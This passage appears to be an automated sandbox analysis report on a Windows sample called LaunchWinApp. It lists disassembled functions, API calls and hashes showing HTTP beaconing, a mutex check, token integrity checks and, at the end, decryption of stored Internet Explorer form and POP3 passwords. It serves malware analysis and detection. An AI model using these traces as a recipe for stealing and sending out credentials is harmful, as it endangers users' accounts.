                    • API ID: H_prolog
                    • String ID: )$array$number overflow parsing '$object$value
                    • API String ID: 3519838083-413397775
                    • Opcode ID: a22291f0fe6be1199054bf92327735eb7c8da10d98f8f22d90c0a5d7436630aa
                    • Instruction ID: c876f187a907d955bf580fb5b3a381b8dccb0abe09f2dec324e6ea06e948919d
                    • Opcode Fuzzy Hash: a22291f0fe6be1199054bf92327735eb7c8da10d98f8f22d90c0a5d7436630aa
                    • Instruction Fuzzy Hash: 0942C271D04218DEDF14DFA5D884BEEBBB4EF48304F40819FE806A7281DB785A48CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4567 436235-43625d GetUserNameA
                    APIs
                    • GetUserNameA.ADVAPI32(?,?), ref: 00436250
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 3f75a5a0aac4c5a2f81ed87c7052b80dd6f72b165fa53e8e0745e400a00dc507
                    • Instruction ID: cb5789710f45fec6cb6b7c9a988bf0cfe96b110e95e03200d453a31137eb00cf
                    • Opcode Fuzzy Hash: 3f75a5a0aac4c5a2f81ed87c7052b80dd6f72b165fa53e8e0745e400a00dc507
                    • Instruction Fuzzy Hash: D4D0C97480811DEBCF50DB90D949AC9B7FCAB00308F0004A294C1E3140FAF4ABC99B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00041441,00440E0A), ref: 0044143A
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: e00c4f2e96a4a4fb44868941b44a0c8a4ba7b05e4674367a6a814512a46c9701
                    • Instruction ID: 18bae3ea7a40761544036f726438442313e6b1f954136037412ae80225c44dbb
                    • Opcode Fuzzy Hash: e00c4f2e96a4a4fb44868941b44a0c8a4ba7b05e4674367a6a814512a46c9701
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3936 4344fe-434537 call 468510 3939 434539-43453b 3936->3939 3940 43453e-434550 WinHttpOpen 3936->3940 3939->3940 3941 434552 3940->3941 3942 434554-434589 call 433cd0 3940->3942 3941->3942 3945 43458b-434595 3942->3945 3946 434597-43459a 3945->3946 3947 43459c-4345c4 call 445850 3945->3947 3946->3945 3950 4345ca-4345d3 3947->3950 3951 4348dc-434907 WinHttpCloseHandle call 41359c call 414005 3947->3951 3952 4345d5-434603 call 414066 call 4390c6 3950->3952 3953 43462a-434658 call 414066 call 4390c6 3950->3953 3966 434607-434628 WinHttpConnect call 413e27 3952->3966 3967 434605 3952->3967 3968 43465a 3953->3968 3969 43465c-434677 WinHttpConnect call 413e27 3953->3969 3974 43467a-434684 call 414005 3966->3974 3967->3966 3968->3969 3969->3974 3977 4348d2-4348d9 WinHttpCloseHandle 3974->3977 3978 43468a-434695 3974->3978 3977->3951 3979 434703-434743 call 414066 call 4390c6 3978->3979 3980 434697-4346d1 call 414066 call 4390c6 3978->3980 3989 434747-43474b 3979->3989 3990 434745 3979->3990 3991 4346d3 3980->3991 3992 4346d5-4346d9 3980->3992 3993 43474f-434768 WinHttpOpenRequest call 413e27 3989->3993 3994 43474d 3989->3994 3990->3989 3991->3992 3995 4346db 3992->3995 3996 4346dd-434701 WinHttpOpenRequest call 413e27 3992->3996 3999 43476d 3993->3999 3994->3993 3995->3996 4001 434773-434792 call 414005 WinHttpSetTimeouts 3996->4001 3999->4001 4004 4348c8-4348cf WinHttpCloseHandle 4001->4004 4005 434798-4347c2 call 44c320 * 2 WinHttpSendRequest 4001->4005 4004->3977 4010 4348c0-4348c6 GetLastError 4005->4010 4011 4347c8-4347d2 WinHttpReceiveResponse 4005->4011 4010->4004 4011->4010 4012 4347d8-4347eb WinHttpQueryDataAvailable call 440d49 4011->4012 4014 4347f0-434812 call 442510 WinHttpReadData 4012->4014 4017 434818-4348a8 call 414066 call 41b311 call 414152 call 414005 call 414152 call 414005 * 2 4014->4017 4018 4348ad-4348b8 call 440a89 4014->4018 4017->4018 4018->4012 4023 4348be 4018->4023 4023->4004
                    APIs
                    • __EH_prolog.LIBCMT ref: 00434503
                    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,0048A818,00000000,00000000), ref: 00434543
                    • WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?), ref: 0043460F
                      • Part of subcall function 004390C6: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 004390EB
                      • Part of subcall function 004390C6: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00439132
                    • WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?), ref: 00434661
                    • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?), ref: 004346E8
                    • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?), ref: 0043475A
                    • WinHttpSetTimeouts.WINHTTP(00000000,00000BB8,00000BB8,00007530,00007530,?,00000000,00000000,00000000,00000000,00000100,?), ref: 0043478A
                    • _strlen.LIBCMT ref: 0043479B
                    • _strlen.LIBCMT ref: 004347A5
                    • WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000100,?), ref: 004347BA
                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,00000000,00000000,00000000,00000000,00000100,?), ref: 004347CA
                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,00000000,00000000,00000000,00000000,00000100,?), ref: 004347E0
                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?,00000000,00000000,00000100,?), ref: 0043480A
                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000100,?), ref: 004348C0
                    • WinHttpCloseHandle.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?), ref: 004348C9
                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 004348D3
                    • WinHttpCloseHandle.WINHTTP(?), ref: 004348DD
                    Strings
                    • Content-Type: text/plain; charset=UTF-8, xrefs: 004347B4
                    • %99[^:]://%99[^/]%99[^], xrefs: 00434569
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSendTimeouts
                    • String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
                    • API String ID: 2655695305-3818427525
                    • Opcode ID: b77a022f8e2187e42fd74cfc1cce0bbd4b19f0ac0b96dcdc1c289341e6e56e0f
                    • Instruction ID: 3182b266e546ac90e1301814d1b7de8aa1530414b50454a6e5d54c37d4a25e0b
                    • Opcode Fuzzy Hash: b77a022f8e2187e42fd74cfc1cce0bbd4b19f0ac0b96dcdc1c289341e6e56e0f
                    • Instruction Fuzzy Hash: 2FC17D74C01259EFDB14DF96CD84AEEBBB8EF49304F1040AEE405A7251DB785A88CF69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4035 439263-439284 GetCurrentProcess OpenProcessToken 4036 439302 4035->4036 4037 439286-43929e GetTokenInformation 4035->4037 4040 439304-439307 4036->4040 4038 4392a0-4392a9 GetLastError 4037->4038 4039 4392ab-4392cc GlobalAlloc GetTokenInformation 4037->4039 4038->4036 4038->4039 4039->4036 4041 4392ce-4392e0 ConvertSidToStringSidW 4039->4041 4041->4036 4042 4392e2-4392f3 call 451c4c 4041->4042 4045 4392f7-439300 GlobalFree 4042->4045 4046 4392f5 4042->4046 4045->4040 4046->4045
                    APIs
                    • GetCurrentProcess.KERNEL32(00000008,?), ref: 00439275
                    • OpenProcessToken.ADVAPI32(00000000), ref: 0043927C
                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00439296
                    • GetLastError.KERNEL32 ref: 004392A0
                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 004392B0
                    • GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 004392C4
                    • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 004392D8
                    • GlobalFree.KERNEL32 ref: 004392F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                    • String ID: S-1-5-18
                    • API String ID: 857934279-4289277601
                    • Opcode ID: edcb4446c9ec4a83aae49d1b09c5ee5a4ca912e2161760a7c213f870e203ea1b
                    • Instruction ID: 39ecd7c2a0b44a3dde09c3b187e80756c7c84462810f2d261e057b0a29825c1e
                    • Opcode Fuzzy Hash: edcb4446c9ec4a83aae49d1b09c5ee5a4ca912e2161760a7c213f870e203ea1b
                    • Instruction Fuzzy Hash: 42114C79904114BBDB119BA29D09F9F7FB8EB08751F104465F902D11A0EBB48E04DB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4047 422ae1-422aef 4048 422b32-422b35 4047->4048 4049 422af1-422b05 4047->4049 4050 422b07-422b0a 4049->4050 4051 422b68-422b79 call 423130 4049->4051 4052 422b58-422b66 call 4231a8 4050->4052 4053 422b0c-422b0f 4050->4053 4061 422b8c-422b92 call 443a5b 4051->4061 4069 422b89 4052->4069 4057 422b11-422b14 4053->4057 4058 422b48-422b56 call 4231c3 4053->4058 4059 422b16-422b19 4057->4059 4060 422b38-422b46 call 42318d 4057->4060 4058->4069 4064 422b7b-422b84 call 4231de 4059->4064 4065 422b1b-422b2f call 44fbaf 4059->4065 4060->4069 4064->4069 4065->4048 4069->4061
                    APIs
                    • std::bad_exception::bad_exception.LIBCMT ref: 00422B3C
                    • std::bad_exception::bad_exception.LIBCMT ref: 00422B4C
                    • std::bad_exception::bad_exception.LIBCMT ref: 00422B5C
                    • std::bad_exception::bad_exception.LIBCMT ref: 00422B7F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$false$hTcH
                    • API String ID: 2160870905-3522427401
                    • Opcode ID: 469e34ef801cd50d83ceb550333f45ed0c8549e552ef8e199538b48cd5c174a2
                    • Instruction ID: b0d0b246637ec978a8a835a740d5bbc4b4a86905d2b0e54410f960fdc7c06bbc
                    • Opcode Fuzzy Hash: 469e34ef801cd50d83ceb550333f45ed0c8549e552ef8e199538b48cd5c174a2
                    • Instruction Fuzzy Hash: 10112731B4022476CB19BF64EE5AEFF7B206F11719FA4420FB01122591C1ADA61EC25E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4301 438f36-438f8d call 468510 4304 438f90-438fa3 4301->4304 4304->4304 4305 438fa5-438fe0 RegOpenKeyExA 4304->4305 4306 438fe3-438fed 4305->4306 4307 438ff4-439017 RegQueryValueExA 4306->4307 4308 438fef-438ff2 4306->4308 4309 439019-43901b 4307->4309 4310 43902c-439068 RegCloseKey call 4140e0 call 414066 4307->4310 4308->4306 4309->4310 4311 43901d-439027 call 414066 4309->4311 4317 43906f-43907e 4310->4317 4311->4310 4318 439080-4390a4 call 447210 call 41402b 4317->4318 4319 4390a6-4390c5 call 414005 * 2 4317->4319 4318->4317
                    APIs
                    • __EH_prolog.LIBCMT ref: 00438F3B
                    • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020119,?,0048A818,00000000,00000000), ref: 00438FBF
                    • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000040), ref: 0043900E
                    • RegCloseKey.ADVAPI32(?), ref: 0043902F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseH_prologOpenQueryValue
                    • String ID: @
                    • API String ID: 1233982722-2766056989
                    • Opcode ID: 21081de2faae48ea08353a73dfc8764377531f4c7101fc95f9d6b8033f0ea62b
                    • Instruction ID: 4939e6b19bad704bd84383b5c505a9f3cf8781dda692871c7e59ed54aa19d7c9
                    • Opcode Fuzzy Hash: 21081de2faae48ea08353a73dfc8764377531f4c7101fc95f9d6b8033f0ea62b
                    • Instruction Fuzzy Hash: 18516A71D002589FDB21CFA9C880AEEBBB9FF48304F14416EE549A7202DB745A88CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4328 443a5b-443a73 4329 443a75-443a78 4328->4329 4330 443aa2-443ac4 KiUserExceptionDispatcher 4328->4330 4331 443a98-443a9b 4329->4331 4332 443a7a-443a96 4329->4332 4331->4330 4333 443a9d 4331->4333 4332->4330 4332->4331 4333->4330
                    APIs
                    • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00000000,tI3iZ,?,0043FE5D,00000000,00485748,?), ref: 00443ABB
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: DispatcherExceptionUser
                    • String ID: HWH$\1A$tI3iZ
                    • API String ID: 6842923-3666237150
                    • Opcode ID: 73cff91b3f8154b3218b70cde12b15d0983f003bcf5e275a2267df3da4fafff0
                    • Instruction ID: 78d11d752c5ea704a0754d0b8d88eab02e005f1556d1cdce3e03203ce6e341ea
                    • Opcode Fuzzy Hash: 73cff91b3f8154b3218b70cde12b15d0983f003bcf5e275a2267df3da4fafff0
                    • Instruction Fuzzy Hash: 7601A276A00209ABD7019F5DD884BAEBBF8FF84B04F15405AED45AB390E770EE00CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4336 4610d4-4610e9 GetEnvironmentStringsW 4337 461144 4336->4337 4338 4610eb-46110c call 46109d call 45b5e8 4336->4338 4339 461146-461148 4337->4339 4338->4337 4346 46110e-46110f call 45a421 4338->4346 4341 461151-461157 4339->4341 4342 46114a-46114b FreeEnvironmentStringsW 4339->4342 4342->4341 4348 461114-461119 4346->4348 4349 46111b-461131 call 45b5e8 4348->4349 4350 461139 4348->4350 4349->4350 4355 461133-461137 4349->4355 4352 46113b-461142 call 45813e 4350->4352 4352->4339 4355->4352
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 004610DD
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0046114B
                      • Part of subcall function 0045B5E8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0045A77A,?,00000000,00000000), ref: 0045B694
                      • Part of subcall function 0045A421: RtlAllocateHeap.NTDLL(00000000,0043FE4F,00000000,?,00441C9B,00000002,00000000,?,tI3iZ,?,0040A956,0043FE4F,00000004,00000000,00000000,00000000), ref: 0045A453
                    • _free.LIBCMT ref: 0046113C
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                    • String ID:
                    • API String ID: 2560199156-0
                    • Opcode ID: 6141c92de87a54b0077db9c3ac7c5fe6e64138c422514f9af111d2ffa184b58b
                    • Instruction ID: 3c8886e7aed14680dc9250b0622c9d46040dd5234f7bc0cce68a51df2efd7e04
                    • Opcode Fuzzy Hash: 6141c92de87a54b0077db9c3ac7c5fe6e64138c422514f9af111d2ffa184b58b
                    • Instruction Fuzzy Hash: A50188B26017157B27211AB75C89CFB596DCEC7B98718012BFE04D2211FE688C0291BB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • __EH_prolog.LIBCMT ref: 00422695
                      • Part of subcall function 00422654: __EH_prolog.LIBCMT ref: 00422659
                      • Part of subcall function 00422C6B: __EH_prolog.LIBCMT ref: 00422C70
                      • Part of subcall function 0042427D: __EH_prolog.LIBCMT ref: 00424282
                      • Part of subcall function 00422D37: __EH_prolog.LIBCMT ref: 00422D3C
                      • Part of subcall function 0041B7BB: __EH_prolog.LIBCMT ref: 0041B7C0
                      • Part of subcall function 00422FAA: __EH_prolog.LIBCMT ref: 00422FAF
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                      • Part of subcall function 0041B796: ___std_exception_destroy.LIBVCRUNTIME ref: 0041B7A6
                      • Part of subcall function 0041B796: ___std_exception_destroy.LIBVCRUNTIME ref: 0041B7B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog$___std_exception_destroy$Deallocate
                    • String ID: value
                    • API String ID: 2272592100-494360628
                    • Opcode ID: a33d3db77f3dd4ca87a18eb2a129eb61487f31996a8ac76b40d0e28579252018
                    • Instruction ID: d3462780419007ab9116c0340c34f49ae3a484023cac47b34d386178795013be
                    • Opcode Fuzzy Hash: a33d3db77f3dd4ca87a18eb2a129eb61487f31996a8ac76b40d0e28579252018
                    • Instruction Fuzzy Hash: 55711B70E00218AECF14EBB5D9417DEBBF4AF59304F50449FE405A7282DB781B48CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4438 455096-4550ac 4439 4551b7 4438->4439 4440 4550b2-4550d2 4438->4440 4441 4551ba-4551be 4439->4441 4442 455175-4551b5 call 447529 * 4 4440->4442 4443 4550d8-4550e4 4440->4443 4442->4441 4444 4550e6 4443->4444 4445 4550e8-4550ed 4443->4445 4444->4445 4447 4550f2-4550f4 4445->4447 4448 4550ef-4550f1 4445->4448 4450 4550f6-4550fa call 4611a8 4447->4450 4451 455113-455131 call 4611a8 call 45813e 4447->4451 4448->4447 4456 4550ff-455111 call 45813e 4450->4456 4451->4439 4465 455137-455161 4451->4465 4456->4451 4456->4465 4465->4442 4467 455163-455166 4465->4467 4468 455168-455170 4467->4468 4468->4468 4469 455172 4468->4469 4469->4442
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 27b3c7da813610413e8ac38354982157633184f5bdfac6cc4c11b4f0f599fbd2
                    • Instruction ID: 778ea3b4a939596d57af07bd40987807942cef8691ad2a7daa5f432b1477ce71
                    • Opcode Fuzzy Hash: 27b3c7da813610413e8ac38354982157633184f5bdfac6cc4c11b4f0f599fbd2
                    • Instruction Fuzzy Hash: 9C41D636E00600AFDB10DF69C891A6EB7B6EF89715F15446EE901EB352DB34ED06CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4470 45e7ec-45e7f7 4471 45e804-45e80a 4470->4471 4472 45e7f9-45e802 call 45a421 4470->4472 4474 45e815-45e818 4471->4474 4475 45e80c-45e813 call 45813e 4471->4475 4480 45e828-45e82a 4472->4480 4478 45e83f-45e851 RtlReAllocateHeap 4474->4478 4479 45e81a-45e81f call 44c424 4474->4479 4487 45e825 4475->4487 4481 45e853 4478->4481 4482 45e82b-45e832 call 456df1 4478->4482 4479->4487 4486 45e827 4481->4486 4482->4479 4490 45e834-45e83d call 45463d 4482->4490 4486->4480 4487->4486 4490->4478 4490->4479
                    APIs
                    • _free.LIBCMT ref: 0045E80D
                      • Part of subcall function 0045A421: RtlAllocateHeap.NTDLL(00000000,0043FE4F,00000000,?,00441C9B,00000002,00000000,?,tI3iZ,?,0040A956,0043FE4F,00000004,00000000,00000000,00000000), ref: 0045A453
                    • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,004611F1,?,00000004,00000000,?,?,?,0045511F,?,00000000), ref: 0045E849
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap$_free
                    • String ID:
                    • API String ID: 1482568997-0
                    • Opcode ID: 0a47a7c8f26fb19508831b85fd30ae71473aeb387b652985e9327cb436aed0bf
                    • Instruction ID: 42ca19433fe536447144f72781c51fd043e3620c12d6bd637a415058332aad6c
                    • Opcode Fuzzy Hash: 0a47a7c8f26fb19508831b85fd30ae71473aeb387b652985e9327cb436aed0bf
                    • Instruction Fuzzy Hash: 18F0C831501210A6DB293A17DC04A6F27989F81B77F15403BFC5467293DE2C9A0991EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4493 43656b-436586 4494 436588-436595 4493->4494 4494->4494 4495 436597-4365ba call 436235 call 435c2d OpenMutexA 4494->4495 4500 4365c9 4495->4500 4501 4365bc-4365c7 CreateMutexA 4495->4501 4502 4365cb-4365ce 4500->4502 4501->4502
                    APIs
                    • OpenMutexA.KERNEL32 ref: 004365B2
                    • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 004365BF
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mutex$CreateOpen
                    • String ID:
                    • API String ID: 4030545807-0
                    • Opcode ID: 119aaba3e4833f859c7cc3027f01ac8899194346f9d004c484927451f4d71b09
                    • Instruction ID: bc4f5322a732dbfbcf72cef345dcb4a1a5255e74c7d447d7fe82ee20308baf3b
                    • Opcode Fuzzy Hash: 119aaba3e4833f859c7cc3027f01ac8899194346f9d004c484927451f4d71b09
                    • Instruction Fuzzy Hash: DBF02B1490435976DF01ABB91C568FFBBFC9E0A344B01B17DE44562113F6A8894E83A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4503 454b7a-454b81 4504 454b86-454b8d call 460de0 call 4610d4 4503->4504 4505 454b83-454b85 4503->4505 4509 454b92-454b96 4504->4509 4510 454b9d-454ba6 call 454c1b 4509->4510 4511 454b98-454b9b 4509->4511 4516 454bad-454bb4 4510->4516 4517 454ba8-454bab 4510->4517 4512 454bc1-454bcc call 45813e 4511->4512 4519 454bb9-454bc0 call 45813e 4516->4519 4517->4519 4519->4512
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 44f861eefd073526018874d36c4ba8c6cf1306c38e382c8bf26c9c0a99295fa2
                    • Instruction ID: 787f506ff1532a6c7e39f2abcf3748760f7d495596372960425ab69c622bbca3
                    • Opcode Fuzzy Hash: 44f861eefd073526018874d36c4ba8c6cf1306c38e382c8bf26c9c0a99295fa2
                    • Instruction Fuzzy Hash: CCE0303290651155A611672B7C0176B16899BC137EF11022FEC609A5D3EE6898CA525E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4522 42247a-4224ac call 468510 call 42293f 4527 4224b5-4224d1 4522->4527 4528 4224ae-4224b2 4522->4528 4529 4224e2-4224f8 4527->4529 4530 4224d3-4224df 4527->4530 4528->4527 4531 4224fa-422505 4529->4531 4532 42250b-422550 call 423031 call 4232b4 call 42245c call 422690 4529->4532 4530->4529 4531->4532 4542 422555-422570 call 4225f3 call 42245c 4532->4542 4547 422572 call 40af5f 4542->4547 4548 422577-42258f call 42245c 4542->4548 4547->4548
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 7be70b044aaad7483c32f2e0d4326c13f4f7975dd8448be710766ce3b4b8989e
                    • Instruction ID: 9b4d18ee3d3b879b515d90f923db4101d68ab231ad1b62f5a0a1e083c9349f6f
                    • Opcode Fuzzy Hash: 7be70b044aaad7483c32f2e0d4326c13f4f7975dd8448be710766ce3b4b8989e
                    • Instruction Fuzzy Hash: 07315C74E01259AFDF14EFA4D951BEEBBB4BF08304F4081AEE40AA3241DB785A49CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 4552 45a421-45a42d 4553 45a45f-45a46a call 44c424 4552->4553 4554 45a42f-45a431 4552->4554 4561 45a46c-45a46e 4553->4561 4556 45a433-45a434 4554->4556 4557 45a44a-45a45b RtlAllocateHeap 4554->4557 4556->4557 4558 45a436-45a43d call 456df1 4557->4558 4559 45a45d 4557->4559 4558->4553 4564 45a43f-45a448 call 45463d 4558->4564 4559->4561 4564->4553 4564->4557
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,0043FE4F,00000000,?,00441C9B,00000002,00000000,?,tI3iZ,?,0040A956,0043FE4F,00000004,00000000,00000000,00000000), ref: 0045A453
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 7bc5926f72d55e304c5266ff1ce8dcc9842f8bbb4b2f1e23230ae6f9068803d2
                    • Instruction ID: c04b13823d0d1e9781c09d4fc9e3a970414c6a289403dd75cb5b6a0c56c790f2
                    • Opcode Fuzzy Hash: 7bc5926f72d55e304c5266ff1ce8dcc9842f8bbb4b2f1e23230ae6f9068803d2
                    • Instruction Fuzzy Hash: BAE0E53110112057D72026E29C09B5B76889B433A6F050237FD04972D3EBDCCC1985EF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00435D8C: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 00435DD4
                      • Part of subcall function 00435D8C: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 00435DF3
                      • Part of subcall function 00435D8C: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00435E2E
                      • Part of subcall function 00435D8C: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 00435E4F
                    • CryptUnprotectData.CRYPT32(TG,00000000,00000000,00000000,00000000,00000001,?), ref: 0043510C
                    • LocalFree.KERNEL32(?), ref: 00435144
                    • lstrlenW.KERNEL32(POP3 Password), ref: 00435151
                    • lstrlenW.KERNEL32(00000001), ref: 00435175
